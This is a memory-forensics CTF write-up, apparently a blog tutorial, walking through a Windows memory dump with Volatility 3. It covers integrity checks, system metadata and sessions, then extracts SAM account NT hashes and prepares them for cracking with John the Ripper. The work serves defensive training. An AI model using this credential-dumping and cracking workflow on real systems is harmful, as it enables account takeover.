<p><b>**TOTAL RECALL 2024** - Memory Forensics Self-Paced Learning/Challenge/CTF</b><br />Learning by practicing | Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PEN | Published 2024-03-08, updated 2024-03-20</p><p>Similar to "<a href="https://www.securitynik.com/2023/09/solving-ctf-challenge-network-forensics.html" target="_blank"><i>Solving the CTF challenge - Network Forensics (packet and log analysis), USB Disk Forensics, Database Forensics, Stego</i></a>", this challenge is meant to support our team's development.</p><p>This challenge can be looked at from both the Blue and Red Team perspectives.</p><p>Blue team because this is how we hope to find threats, either on a "live" system or, more specifically in this case, in the contents of extracted memory, i.e. memory dumps, crash dumps, etc.</p><p>Red team because threat actors can steal memory dumps to gain access to sensitive information. For those thinking this is far-fetched, see this link for more info on a recent compromise that occurred at Microsoft: <a href="https://msrc.microsoft.com/blog/2023/09/results-of-major-technical-investigations-for-storm-0558-key-acquisition/">Results of Major Technical Investigations for Storm-0558 Key Acquisition | MSRC Blog | Microsoft Security Response Center</a>.</p><p>Here is a brief from the link:<br /><i>"Our investigation found that a consumer signing system crash in April of 2021 resulted in a snapshot of the crashed process (“crash dump”). The crash dumps, which redact sensitive information, should not include the signing key. 
In this case, a race condition allowed the key to be present in the crash dump ..."</i></p><p><i>After April 2021, when the key was leaked to the corporate environment in the crash dump, the Storm-0558 actor was able to successfully compromise a Microsoft engineer’s corporate account. This account had access to the debugging environment containing the crash dump which incorrectly contained the key. Due to log retention policies, we don’t have logs with specific evidence of this exfiltration by this actor, but this was the most probable mechanism by which the actor acquired the key."</i></p><p>As seen above, memory can and does contain a lot of sensitive information. More importantly, not every incident will leave you with all the logs, as the quote above shows.</p><p>With that in mind, <b><i>Welcome to **Total Recall 2024** </i></b>where we try to build our memory forensics skills while having fun.</p><p><b>Scenario:<br /></b></p><p class="MsoNormal"><i><span style="font-family: 'Times New Roman', serif;">As the Lead Incident Handler at **TOTAL RECALL Inc.**, a memory
forensics company, you have been assigned a case to determine the extent of a possible compromise at a highly confidential client. The client has followed the NIST 800-86 Guide to Integrating Forensic Techniques into Incident Response and has done the evidence collection. Your job is to examine, analyze and report on this potential incident.</span></i></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVHyGrslhh9zVntuHCw21xP7IsuqvhoJiK8zMaeAvYpvBOakeadMJWx8yugVK7Eg7vNMlILr4QNFILjxS7GyByqdSAtcsyvAQ72sRHYeVzPPUVP9IoXPqlCilGa_p1LvYt-Kp-5Q4kCjiLNuJkmy4HQQT1qo3e2MmNbNra91Hw3dHzJn_FSGp-Js2sDhw/s743/NIST-800-86.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="263" data-original-width="743" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVHyGrslhh9zVntuHCw21xP7IsuqvhoJiK8zMaeAvYpvBOakeadMJWx8yugVK7Eg7vNMlILr4QNFILjxS7GyByqdSAtcsyvAQ72sRHYeVzPPUVP9IoXPqlCilGa_p1LvYt-Kp-5Q4kCjiLNuJkmy4HQQT1qo3e2MmNbNra91Hw3dHzJn_FSGp-Js2sDhw/w400-h141/NIST-800-86.PNG" width="400" /></a></div><div style="text-align: center;"><span style="font-size: 9pt;">Source: NIST 800-86: Guide to Integrating Forensic Techniques into Incident Response</span></div><div style="text-align: left;"><i>You do not have any known Indicators of Compromise (IoC) or Events of Interest (EoI) but have been tasked with determining the (potential) compromise and its scope. That is all you have to go on!</i></div><p>
</p><p class="MsoNormal">As you answer the client’s questions, you should take notes, draw diagrams, etc.</p><p><span style="font-size: medium;"><b>Here are 10 things you are guaranteed to learn by completing this challenge:</b><br /></span>1. Memory Forensics: This is our primary objective!<br />2. Extracting credentials from memory: Not just passwords, but also web server certificate public and private key information. <a href="https://msrc.microsoft.com/blog/2023/09/results-of-major-technical-investigations-for-storm-0558-key-acquisition/">Similar to what happened with this compromise at Microsoft</a>. This allows us to encrypt/decrypt, sign and verify items on the compromised server's behalf.<br />3. Performing network forensics (log analysis): Yep! We extract the logs from memory to learn more about the attack.<br />4. Basic Malware Analysis: That's correct! Extracting/reconstructing executables from memory and doing basic static analysis.<br />5. Attack identification: Learning to attribute a particular tactic and/or technique to a compromise.<br />6. Vulnerability Research: Finding the version of software and any known vulnerabilities associated with it.<br />7. Recovering PowerShell history from memory.<br />8. Web Server configuration at the time of compromise.<br />9. Detecting persistence in memory.<br />10. Lots of fun learning about memory forensics.</p><p>Good luck and have fun learning!</p><p><a href="https://github.com/SecurityNik/CTF" target="_blank">Data for this challenge</a><br />Note: Try downloading the individual files if you have a problem downloading the entire package.</p><p><b><span style="font-size: medium;">My write-up for the challenge, so that readers can walk or follow through.</span></b></p><p>These first few questions allow us to learn about the received memory image before performing any analysis.</p><p>When performing forensics, one of the first steps is confirming that the file integrity is intact.</p><div><div><b>Q</b>: What is the md5sum hash of the file received?</div><div><b>A</b>:</div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES]</span>
<span><span style="color: white;">└─$ </span><b><span style="color: #fcff01;">md5sum TOTAL_RECALL_2024.zip</span></b><span style="color: white;"> --tag</span></span>
<span><b><span style="color: #fcff01;">MD5 </span></b><span style="color: white;">(TOTAL_RECALL_2024.zip) = </span><span style="color: #fcff01;"><b>7dceb1fcae2ed8beacc8f81f85bf935c</b></span></span>
</pre></div><br /></div><div><div><b>Q</b>: Does this hash match the one provided?</div></div><div><b>A</b>: Yes: </div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES]</span>
<span><span style="color: white;">└─$ cat </span><b><span style="color: #fcff01;">TOTAL_RECALL_2024.md5sum</span></b></span>
<span><b><span style="color: #fcff01;">7dceb1fcae2ed8beacc8f81f85bf935c</span></b><span style="color: white;"> TOTAL_RECALL_2024.zip</span></span>
</pre></div>
</div><div><br /></div><div><div>With the hashes confirmed, we can move on to our analysis.</div><div>Extract the files from the ZIP file:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES]</span>
<span style="color: white;">└─$ unzip ChristmasChallenge2023.zip -d TOTAL_RECALL_2024/</span>
<span style="color: white;">Archive: ChristmasChallenge2023.zip</span>
<span style="color: white;"> inflating: TOTAL_RECALL_2024/SECURITYNIK-WIN-20231116-235706.dmp</span>
<span style="color: white;"> inflating: TOTAL_RECALL_2024/SECURITYNIK-WIN-20231116-235706.json</span>
</pre></div>
</div><div><br /></div><div><div>Change into the extracted directory so all output for this challenge lands there:</div></div><div><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES]</span>
<span style="color: white;">└─$ cd TOTAL_RECALL_2024/</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the memory dump file info specifically:</div><div><br /><b>Q:</b> What is the SHA256 hash of the file containing the memory dump?</div><div><b>A: </b><br /><b><!--HTML generated using hilite.me--></b><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white; font-weight: bold;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span><b>
</b><span><b><span style="color: white;">└─$ </span><span style="color: #fcff01;">sha256sum</span><span style="color: white;"> SECURITYNIK-WIN-20231116-235706.dmp</span></b></span><b>
</b><span style="color: #fcff01; font-weight: bold;">cabe2fd543eac1cd2eab9ccd0a840d83481a3f00e16015287323b2cb44fe0686 </span><span style="color: white; font-weight: bold;">SECURITYNIK-WIN-20231116-235706.dmp</span><b>
</b></pre></div>
</div></div><div><br /></div><div><div><b>Q:</b> What is the size of the memory dump file?</div><div><b>A:</b><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ ls -l SECURITYNIK-WIN-20231116-235706.dmp -l</span>
<span><span style="color: white;">-rw-r--r-- 1 kali kali </span><b><span style="color: #fcff01;">4293816320 </span></b><span style="color: white;">Nov 16 18:57 SECURITYNIK-WIN-20231116-235706.dmp</span></span>
</pre></div>
</div></div><div><br /></div><div><div><b>Q:</b> Were you able to confirm this file's integrity? If yes, how?</div><div><b>A:</b> Yes! A JSON file comes with the memory dump. Here is its file information:</div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ cat SECURITYNIK-WIN-20231116-235706.json | grep fileInfo --after-context=2</span>
<span style="color: white;"> "fileInfo": {</span>
<span style="color: white;"> "fileSize": 4293816320,</span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">"sha256": "cabe2fd543eac1cd2eab9ccd0a840d83481a3f00e16015287323b2cb44fe0686"</span></b></span>
</pre></div>
</div><div><br /></div><div><br /></div><div><div>I deliberately used the true date and time from the file. I'm sure someone is going to overthink this :-D </div><div><br /></div><div>Looking at the machine info, answer the following questions:</div><div><b>Q:</b> What is the machine architecture?</div><div><b>Q:</b> What is the date and time the memory dump was taken?</div><div><b>Q:</b> What domain was the computer part of?</div><div><b>Q:</b> What is the Machine ID?</div><div><b>Q:</b> What is the Machine Name?</div><div><b>Q:</b> What is the timestamp as a raw epoch value? For example: 133446526281339811</div><div><b>Q:</b> What is the name of the user logged in at the time the capture was taken?</div><div><br /></div><div><b>A:</b> All of the information above can be found below.</div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ cat SECURITYNIK-WIN-20231116-235706.json | grep machineInfo --after-context=9</span>
<span style="color: white;"> "machineInfo": {</span>
<span style="color: white;"> "architectureType": "x64",</span>
<span style="color: white;"> "date": "2023-11-16T23:57:55.647Z",</span>
<span style="color: white;"> "domainName": "SECURITYNIK",</span>
<span style="color: white;"> "machineId": "3A424D56-BF4F-0582-FA8B-86105F2A025C",</span>
<span style="color: white;"> "machineName": "SECURITYNIK-WIN",</span>
<span style="color: white;"> "maxPhysicalMemory": 5368709120,</span>
<span style="color: white;"> "numberProcessors": 2,</span>
<span style="color: white;"> "timestamp": 133446526281339811,</span>
<span style="color: white;"> "userName": "securitynik"</span>
</pre></div>
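<p>The two checks above (size and SHA-256 against the sidecar's <i>fileInfo</i> block) and the raw <i>timestamp</i> question can be automated. The following is an added example, my own code and not part of the original write-up or of DumpIt/Volatility. It assumes the <i>machineInfo.timestamp</i> value is a Windows FILETIME (100 ns ticks since 1601-01-01 UTC); under that assumption 133446526281339811 decodes to 2023-11-16 23:57:08 UTC, which plus the 47-second <i>acquisitionTime</i> gives the 23:57:55 <i>date</i> field, i.e. the capture start. The fixture writes a constructed fake dump and sidecar to a temporary directory, so the real 4 GB file is never needed to try it.</p>

```python
import hashlib
import json
import os
import tempfile
from datetime import datetime, timedelta, timezone

# Windows FILETIME: 100-nanosecond ticks since 1601-01-01 00:00:00 UTC.
# Assumption: DumpIt's machineInfo.timestamp is stored in this format.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_utc(ticks: int) -> datetime:
    """Convert a FILETIME tick count to a timezone-aware UTC datetime."""
    # Integer division keeps microsecond precision without float rounding.
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def hash_file(path: str, algo: str = "sha256", chunk: int = 1 << 20) -> str:
    """Stream the file through hashlib so a multi-GB dump never sits in RAM."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def verify_dump(dump_path: str, sidecar_path: str) -> dict:
    """Compare the dump against the sidecar's fileInfo and decode the start time."""
    with open(sidecar_path, encoding="utf-8") as f:
        meta = json.load(f)
    info = meta["fileInfo"]
    result = {
        "size_ok": os.path.getsize(dump_path) == int(info["fileSize"]),
        "sha256_ok": hash_file(dump_path) == info["sha256"].lower(),
    }
    ticks = meta.get("machineInfo", {}).get("timestamp")
    if ticks is not None:
        result["dump_started_utc"] = filetime_to_utc(int(ticks)).isoformat(timespec="seconds")
    return result


def demo() -> tuple:
    """Constructed fixture: a tiny fake dump plus a matching sidecar, then a tampered copy."""
    with tempfile.TemporaryDirectory() as workdir:
        dump = os.path.join(workdir, "FAKE-HOST.dmp")        # constructed name, not the challenge file
        sidecar = os.path.join(workdir, "FAKE-HOST.json")
        payload = b"PAGEDUMP" + b"\x00" * 4096               # constructed bytes, not a real crash dump
        with open(dump, "wb") as f:
            f.write(payload)
        meta = {
            "fileInfo": {"fileSize": len(payload), "sha256": hashlib.sha256(payload).hexdigest()},
            # timestamp value taken from the challenge's own JSON sidecar
            "machineInfo": {"timestamp": 133446526281339811},
        }
        with open(sidecar, "w", encoding="utf-8") as f:
            json.dump(meta, f)
        intact = verify_dump(dump, sidecar)
        # Flip one byte: the size is unchanged, so only the hash catches the tampering.
        with open(dump, "r+b") as f:
            f.seek(16)
            f.write(b"\x01")
        tampered = verify_dump(dump, sidecar)
        return intact, tampered


if __name__ == "__main__":
    print(demo())
```

<p>Pointing <i>verify_dump()</i> at the real <i>.dmp</i> and <i>.json</i> pair reproduces the sha256sum and ls checks in one step; the size check alone is not enough, as the tampered fixture shows.</p>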
</div><div><br /></div><div>Looking at the operating system information:</div><div><div><br /></div><div>The product type maps to a desktop according to: <a href="https://learn.microsoft.com/en-us/windows/win32/msi/msintproducttype">MsiNTProductType property - Win32 apps | Microsoft Learn</a></div><div><b>Q: </b>What is the OS major version?</div><div><b>Q:</b> What is the OS minor version?</div><div><b>Q:</b> What is the product type?</div><div><b>Q:</b> Is the product type a server or desktop/workstation, etc.?</div><div><b>A:</b> Desktop, because the product type is 1:</div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ cat SECURITYNIK-WIN-20231116-235706.json | grep osVersion --after-context=7</span>
<span style="color: white;"> "osVersion": {</span>
<span style="color: white;"> "buildNumber": 22621,</span>
<span style="color: white;"> "majorVersion": 10,</span>
<span style="color: white;"> "minorVersion": 0,</span>
<span style="color: white;"> "productType": 1,</span>
<span style="color: white;"> "servicePackMajor": 0,</span>
<span style="color: white;"> "servicePackMinor": 0,</span>
<span style="color: white;"> "suiteMask": 256</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the memory acquisition info:</div><div><br /></div><div><b>Q: </b>What was the acquisition time of this memory dump?</div><div><b>Q:</b> What is the name of the tool/service used to capture this memory?</div><div><b>Q:</b> What version of the tool was used?</div><div><b>Q:</b> What is the total number of accessible pages of memory that were captured?</div><div><b>Q:</b> What is the total number of inaccessible pages of memory captured?</div><div><b>Q:</b> What is the total number of physical pages of memory captured?</div><div><br /></div><div><b>A:</b> All of the information requested above can be found below.</div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ cat SECURITYNIK-WIN-20231116-235706.json | grep serviceInfo --after-context=7</span>
<span style="color: white;"> "serviceInfo": {</span>
<span style="color: white;"> "acquisitionTime": "0:47",</span>
<span style="color: white;"> "ntStatus": 0,</span>
<span style="color: white;"> "serviceName": "DumpIt",</span>
<span style="color: white;"> "serviceVersion": "3.0.20180307.1",</span>
<span style="color: white;"> "totalAccessiblePages": 1048293,</span>
<span style="color: white;"> "totalInaccessiblePages": 0,</span>
<span style="color: white;"> "totalPhysicalPages": 1048293</span>
</pre></div>
</div><div><br /></div><div><div>All of the information above can be had by just looking at the <i>SECURITYNIK-WIN-20231116-235706.json </i>file. In other words, simply opening this file gives you the answers to the first 22 questions!</div><div><br /></div><div>With the information about the memory image out of the way, it is time to actually perform the analysis.</div><div><br /></div><div>Typically, we want to start off with the <i>info.Info </i>plugin.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.info.Info</span>
<span style="color: white;">Volatility 3 Framework 2.5.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished</span>
<span style="color: white;">Variable Value</span>
<span style="color: white;">Kernel Base 0xf8021f400000</span>
<span style="color: white;">DTB 0x1ae000</span>
<span style="color: white;">Symbols file:///home/kali/volatility3/volatility3/symbols/windows/ntkrnlmp.pdb/9DC3FC69B1CA4B34707EBC57FD1D6126-1.json.xz</span>
<span style="color: white;">Is64Bit True</span>
<span style="color: white;">IsPAE False</span>
<span style="color: white;">layer_name 0 WindowsIntel32e</span>
<span style="color: white;">memory_layer 1 WindowsCrashDump64Layer</span>
<span style="color: white;">base_layer 2 FileLayer</span>
<span style="color: white;">KdVersionBlock 0xf802200099b0</span>
<span style="color: white;">Major/Minor 15.22621</span>
<span style="color: white;">MachineType 34404</span>
<span style="color: white;">KeNumberProcessors 2</span>
<span style="color: white;">SystemTime 2023-11-16 23:57:55</span>
<span style="color: white;">NtSystemRoot C:\Windows</span>
<span style="color: white;">NtProductType NtProductWinNt</span>
<span style="color: white;">NtMajorVersion 10</span>
<span style="color: white;">NtMinorVersion 0</span>
<span style="color: white;">PE MajorOperatingSystemVersion 10</span>
<span style="color: white;">PE MinorOperatingSystemVersion 0</span>
<span style="color: white;">PE Machine 34404</span>
<span style="color: white;">PE TimeDateStamp Mon Jul 16 20:24:05 2063</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the Windows session information.</div><div><br /></div><div>Get the data into a file, as always:</div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><span style="color: #fcff01;"><b>windows.sessions.Sessions</b></span><span style="color: white;"> > sessions.txt</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished</span>
</pre></div>
</div><div><br /></div><div><div><b>Q:</b> How many unique Windows sessions are seen via the memory dump?</div><div>Session numbers are integer values.</div><div><b>A:</b> Two sessions: 0 and 1<br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ cat sessions.txt | awk --field-separator=' ' '{ print $1 }' | sort --unique</span>
<span style="color: white;">0</span>
<span style="color: white;">1</span>
</pre></div>
</div></div><div><br /></div><div><div><b>Q:</b> What are these sessions associated with?</div><div><b>A:</b> Session 0 is used by services and other non-interactive applications.</div><div>Logged-in users get session 1 and higher. This confirms what we saw earlier: there was only one user logged in, hence one interactive session.</div><div><br /></div><div>Looking at the environment variables:<br /><br /></div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><span style="color: #fcff01;"><b>windows.envars.Envars</b></span><span style="color: white;"> > envars.txt</span>
</pre></div>
</div><div><br /></div><div><div><b>Q:</b> Where does the <i>"ComSpec"</i> environment variable point to?</div><div><b>A:</b> <i>ComSpec</i> points to: <i>"C:\Windows\system32\cmd.exe"</i></div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ grep --perl-regexp 'ComSpec.*' envars.txt --only-matching | sort --unique</span>
<span style="color: white;">ComSpec C:\Windows\system32\cmd.exe</span>
</pre></div>
</div><div><br /></div><div><div><b>Q:</b> What is/are the "USERNAME" defined?</div><div><b>A:</b> The usernames defined are:</div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ grep --perl-regexp 'USERNAME.*' envars.txt --only-matching | sort --unique</span>
<span style="color: white;">USERNAME LOCAL SERVICE</span>
<span style="color: white;">USERNAME securitynik</span>
<span style="color: white;">USERNAME SECURITYNIK-WIN$</span>
<span style="color: white;">USERNAME SYSTEM</span>
</pre></div>
</div><div><br /></div><div><div><b>Q:</b> What is/are the "OS" information?</div><div><b>A:</b> OS is reported as:<br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ grep --perl-regexp 'OS.*' envars.txt --only-matching | sort --unique</span>
<span style="color: white;">OS Windows_NT</span>
</pre></div>
</div></div><div><br /></div><div><div><b>Q:</b> What is/are the "COMPUTERNAME" name(s) identified?</div><div><b>A:</b> Computer name is:<br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ grep --perl-regexp 'COMPUTERNAME.*' envars.txt --only-matching | sort --unique</span>
<span style="color: white;">COMPUTERNAME SECURITYNIK-WIN</span>
</pre></div>
</div></div><div><br /></div><div><div>One of the first things any good hacker does once access is gained is to obtain (dump) credentials. Once again, red team stuff :-) We are here from the defenders' perspective, but we can still get the credentials.</div><div><br /></div><div>If you answered the question above about the user(s) logged in at the time of the memory dump, then this question may or may not make more sense.</div><div><br /></div><div><b>Q:</b> How many user(s) are listed in the Security Accounts Manager (SAM) on this host?</div><div><b>A:</b> There are 6 users reported in the SAM.</div><div><br /></div><div><b>Q:</b> What is/are the user(s) RID, username, LM hash and NT hash?</div><div><b>A:</b> Their RID, username, LM and NT hashes are:</div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span><span style="color: white;">└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><b><span style="color: #fcff01;">windows.hashdump.Hashdump</span></b></span>
<span style="color: white;">Volatility 3 Framework 2.5.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished</span>
<span style="color: white;">User rid lmhash nthash</span>
<span style="color: white;">Administrator 500 aad3b435b51404eeaad3b435b51404ee 23e1d10001876b0078a9a779017fc026</span>
<span style="color: white;">Guest 501 aad3b435b51404eeaad3b435b51404ee 31d6cfe0d16ae931b73c59d7e0c089c0</span>
<span style="color: white;">DefaultAccount 503 aad3b435b51404eeaad3b435b51404ee 31d6cfe0d16ae931b73c59d7e0c089c0</span>
<span style="color: white;">WDAGUtilityAccount <span> </span>504 aad3b435b51404eeaad3b435b51404ee 33651ad684b9bfb2e11f422d80b16ceb</span>
<span style="color: white;">securitynik 1001 aad3b435b51404eeaad3b435b51404ee 23e1d10001876b0078a9a779017fc026</span>
<span style="color: white;">nakia 1003 aad3b435b51404eeaad3b435b51404ee f1c216dcadb73b5960bbcdf03bf3bbe0</span>
</pre></div>
</div><div><br /></div><div><div><b>Q:</b> What is/are the cleartext passwords?</div><div><br /></div><div>If you found the hashes above, you should be able to crack the passwords. </div><div><br /></div><div>There are a number of ways to solve this problem. We can redirect the output to a file and modify the file by replacing the spaces with a colon. This allows us to feed the new file into John the Ripper. </div><div><br /></div><div>First, add the <i>hashdump </i>plugin output to a file.</div></div><div><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span><span style="color: white;">└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><b><span style="color: #fcff01;">windows.hashdump.Hashdump > hashdump.txt</span></b></span>
</pre></div>
</div><div><br /></div><div><div>Clean up the file by replacing the spaces (" ") with a colon (":") and, at the same time, deleting lines 1 to 4 at the beginning of the file. Below shows the cleaned-up file.</div></div><div><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span><span style="color: white;">└─$ cat hashdump.txt | </span><b><span style="color: #fcff01;">sed -e "s/\s/:/g;1,4d"</span></b></span>
<span style="color: white;">Administrator:500:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026</span>
<span style="color: white;">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0</span>
<span style="color: white;">DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0</span>
<span style="color: white;">WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:33651ad684b9bfb2e11f422d80b16ceb</span>
<span style="color: white;">securitynik:1001:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026</span>
